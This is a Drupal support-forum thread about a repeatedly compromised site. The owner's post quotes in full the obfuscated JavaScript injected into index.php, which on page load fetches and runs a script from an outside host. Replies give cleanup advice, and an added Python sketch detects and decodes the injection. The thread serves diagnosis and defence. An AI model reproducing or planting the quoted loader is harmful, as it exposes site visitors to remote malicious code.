I got an error this afternoon on all site pages:
Parse error: syntax error, unexpected '<' in /homepages/31/d292789962/htdocs/parentfocus/index.php on line 41

I replaced the index.php page and all was fine - but a few hours later it was back. The site was last changed on 19 December when I updated it to v6.15.

This looks similar to http://drupal.org/node/632452 but it's on index.php and therefore killing the entire site.

Help me......

Comments

vm’s picture

Rather than replacing the index.php, note the time the file was changed. Have you looked for the < in the file? Is there "other" code there?

Are all your modules up to date?

adam_b’s picture

All the modules are up to date.

I found something odd at the end of the older index.php files after drupal_page_footer:

<script>/*GNU GPL*/ try{window.onload = function(){var Hpna2fvtao7 = document.createElement('s)&c$^r!)))^i$!p&#t!(!'.replace(/\)|\$|#|\!|\^|@|&|\(/ig, ''));var Pppzj4zcslqvp = 'Sgrd3nnppag';Hpna2fvtao7.setAttribute('type', 't!(@#e)&^)x##^^t$$@/!&$j@&(^a$@v)a((s#c^^r)(i@p!t&#'.replace(/\!|#|@|\(|&|\$|\^|\)/ig, ''));Hpna2fvtao7.setAttribute('src',  'h&(#t)t@@p):!!@/##/((!s##$$^p!!^e^&$$e#)&^d)(#$t!(&e@$s#^&t(&$@)-^($^n&@&e(t!&.!@^m^&$#y^)@y#$#&e)!$a@$&r^#&#^b@&o^o)!&$k))!#.^(&c#o$@^m!(&.#$#f#$l^(^i(n!g^#-^c$#o(!$m@)&!).$v#$i@&(d$$!(e&o!)$)s#$a#)&l)!!e&@)o#!n@)l#(i!^)n&(@e!!$).$#r(@)$u@:@)!8)0@@&8@(&#0@$#@(/($1!$^u(!(n)(d^^1$&#(.#))d()e)^^&/@((1##(!^u@(@&n!$!)^d#^)&1)&.#&@d$^e!^$/@^&g)(o&^$o$!$!g@(l)@#e#&!.^c^(o)^m)/@!@w!(($e$!l!l#s@)(f^$$a$r#!g^#o)&(.$#^#c(o!!@m@!@/&!c#)o(#!&n@s&@t(!@a$!(n#)t)#)c#o)@!n$(t#a!)^(c^t###.@c!o@@m($!/)&'.replace(/\$|\!|\)|&|@|#|\^|\(/ig, ''));Hpna2fvtao7.setAttribute('defer', 'd(!e#$@f$(!#&e!r#!&'.replace(/\)|\(|\^|@|&|\$|\!|#/ig, ''));Hpna2fvtao7.setAttribute('id', 'S!)w^z)1)^r&x($#!v&o()y!#5^&&g&@#'.replace(/&|\(|#|\$|@|\^|\!|\)/ig, ''));document.body.appendChild(Hpna2fvtao7);}} catch(Mi72roohrbiw) {}</script>
<!--17ec63acdab17bf277d5302100cb2db8-->

This looks very dubious... what is it?

I've changed the index.php file permissions to read-only - hope that'll help...

vm’s picture

Looks like your install is compromised and may have been before you updated to 6.15.

I'd check every file in the install for any foreign files that don't belong.
I'd change my FTP and account passwords.

Depending on the access level this is coming in on, it may be changing file permissions on its own.

Could be server-level security too, which is the cause.
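
An added example, not part of any poster's reply or of Drupal's code: a Python sketch that walks a site tree for the three markers visible in the block adam_b quoted (the `/*GNU GPL*/` script tag, string literals padded with punctuation and stripped by `.replace`, and the trailing 32-hex-digit comment) and records each hit with the file's modification time. The function names, the extension list and the shortened `SAMPLE` are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Indicators taken from the injected block quoted in the thread.
GPL_TAG = re.compile(r"<script>\s*/\*GNU GPL\*/")
# A string literal immediately stripped by a regex made only of punctuation
# alternatives (heuristic: two or more alternatives, replacement is '').
JUNK_REPLACE = re.compile(
    r"'([^'\n]*)'\.replace\(/((?:\\?[^\w\s/|]\|)+\\?[^\w\s/|])/[gi]*,\s*''\)")
HEX_MARKER = re.compile(r"<!--[0-9a-f]{32}-->")
# Assumed list of file types worth checking in a Drupal 6 tree.
EXTENSIONS = {".php", ".js", ".html", ".htm", ".inc", ".module", ".tpl"}

# Constructed sample: a shortened excerpt of the quoted block (first literal only).
SAMPLE = r"""drupal_page_footer();
<script>/*GNU GPL*/ try{var e = document.createElement('s)&c$^r!)))^i$!p&#t!(!'.replace(/\)|\$|#|\!|\^|@|&|\(/ig, ''));} catch(x) {}</script>
<!--17ec63acdab17bf277d5302100cb2db8-->"""

def scan_text(text):
    """Return the names of the indicators present in text."""
    checks = [("gpl-script-tag", GPL_TAG), ("junk-strip-literal", JUNK_REPLACE),
              ("hex-comment-marker", HEX_MARKER)]
    return [name for name, rx in checks if rx.search(text)]

def decode_literals(text):
    """Apply each literal's own strip-regex to show what it hides."""
    return [re.sub(m.group(2), "", m.group(1), flags=re.I)
            for m in JUNK_REPLACE.finditer(text)]

def scan_tree(root):
    """Map path -> (indicators, mtime) for every flagged file under root."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = (hits, path.stat().st_mtime)
    return findings

if __name__ == "__main__":
    # Usage: python scan.py /path/to/drupal (falls back to the sample).
    if len(sys.argv) > 1:
        for name, (hits, mtime) in sorted(scan_tree(sys.argv[1]).items()):
            print(name, hits, mtime)
    else:
        print(scan_text(SAMPLE), decode_literals(SAMPLE))
```

Comparing the reported modification times against FTP and web server logs helps show which access path rewrote the files.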

yelvington’s picture

There are postings about this attack all over the Internet, and some of them suggest that your Windows PC may be the attack vector through a virus that steals your FTP password.

At a minimum, you should change ALL passwords, replace ALL the Drupal source code with fresh copies, and run virus scans on any Windows PCs that come ANYWHERE near your webserver. If you are using FTP, switch to a secure protocol (scp, sftp).

If your webserver is properly configured, there's no way Apache can modify any PHP files because of different ownership and restrictive permissions.

adam_b’s picture

Okay, I've gone through it all and I think/hope I've got it. I suspect the problem originated from my computer - when I ran a scan it found and isolated a trojan horse.

Many thanks for the quick responses :)

adam_b’s picture

After previous changes, things calmed down - but started having problems again today. From warnings on my PC while accessing the site, it appeared that /sites/default/files/js/*.js files were corrupt, and I found suspicious code being added at the bottom of them.

I scanned my own machine, changed the FTP access password, replaced the entire Drupal installation with new files, etc. - but the files were still being modified.

I tried applying the permissions changes described in http://drupal.org/node/244924 (under If you are a sysadmin/Linux servers), starting from the Drupal root directory, and now I'm getting 403 errors everywhere.

If it helps, the hosts are 1and1.co.uk

Help, pleeeeeease.